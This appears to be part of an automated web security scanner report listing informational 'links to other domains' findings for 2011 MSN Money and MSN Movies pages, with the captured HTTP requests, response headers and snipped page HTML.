...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410534&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&s=&o=&p=0&tab=mkt&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.228. http://redacted/investor/partsub/funds/etfperformancetracker.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353573&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&p=0&tab=mkt&s=ytd&o=d&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:12:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353573&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&p=0&tab=mkt&s=ytd&o=d&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.229. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/mom-pop-culture/tiger-mom-movie/story-feature/

Issue detail

The page was loaded from a URL containing a query string:

http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/?GT1=28101

The response contains the following links to other domains:

http://download.live.com/?sku=messenger
http://entcss.s-redacted/App_Themes/IE7/IE79613.css
http://entcss.s-redacted/styles/e9613.css
http://entcss.s-redacted/styles/entertainment9613.css
http://entcss.s-redacted/styles/gtl_sitegeneric9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-redacted/i/grandprix/msft.png
http://entimg.s-redacted/i/grandprix/nav_pipe.gif
http://entimg.s-redacted/i/ms/ms_logo.gif
http://entimg.s-redacted/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://twitter.com/msntv
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=MOVIES
http://www.bing.com/search?q=tiger+mom&go=&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
http://www.zap2it.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344907&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmovies.redacted%2Fmom-pop-culture%2Ftiger-mom-movie%2Fstory-feature%2F%3FGT1%3D28101&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fmovies.redacted%2fmom-pop-culture%2ftiger-mom-movie%2fstory-feature%2f%3fGT1%3d28101%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /mom-pop-culture/tiger-mom-movie/story-feature/?GT1=28101 HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48647
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=68ce55a47fad475cb115589b40f84311; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Mom &
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><script type="text/javascript">
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=MOVIES">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344907&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmovies.redacted%2Fmom-pop-culture%2Ftiger-mom-movie%2Fstory-feature%2F%3FGT1%3D28101&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fmovies.redacted%2fmom-pop-culture%2ftiger-mom-movie%2fstory-feature%2f%3fGT1%3d28101%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<BR><a href=http://www.zap2it.com/ class="art">Zap2it</a>
...[SNIP]...
</STRONG> <a href=http://www.bing.com/search?q=tiger+mom&go=&form=msnena class="art">'Tiger Mother'</a>
...[SNIP]...
<DIV id=modTwitterPromo><a href=http://twitter.com/msntv class="altlink"><IMG border=0 alt=Twitter src="http://entimg.msn.com/i/mompopculture/2/btn_twitterPromo.jpg" width=300 height=61>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.230. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/mom-pop-culture/tiger-mom-movie/story-feature/

Issue detail

The page was loaded from a URL containing a query string:

http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/?GT1=28101

The response contains the following links to other domains:

http://download.live.com/?sku=messenger
http://entcss.s-redacted/App_Themes/IE7/IE79613.css
http://entcss.s-redacted/styles/e9613.css
http://entcss.s-redacted/styles/entertainment9613.css
http://entcss.s-redacted/styles/gtl_sitegeneric9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-redacted/i/grandprix/msft.png
http://entimg.s-redacted/i/grandprix/nav_pipe.gif
http://entimg.s-redacted/i/ms/ms_logo.gif
http://entimg.s-redacted/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://twitter.com/msntv
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=MOVIES
http://www.bing.com/search?q=tiger+mom&go=&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
http://www.zap2it.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406294&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmovies.redacted%2Fmom-pop-culture%2Ftiger-mom-movie%2Fstory-feature%2F%3FGT1%3D28101&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fmovies.redacted%2fmom-pop-culture%2ftiger-mom-movie%2fstory-feature%2f%3fGT1%3d28101%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48647
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=88d234b32c52460790a7f98c1f7a5462; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:51:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Mom &
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><script type="text/javascript">
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=MOVIES">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406294&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmovies.redacted%2Fmom-pop-culture%2Ftiger-mom-movie%2Fstory-feature%2F%3FGT1%3D28101&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fmovies.redacted%2fmom-pop-culture%2ftiger-mom-movie%2fstory-feature%2f%3fGT1%3d28101%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
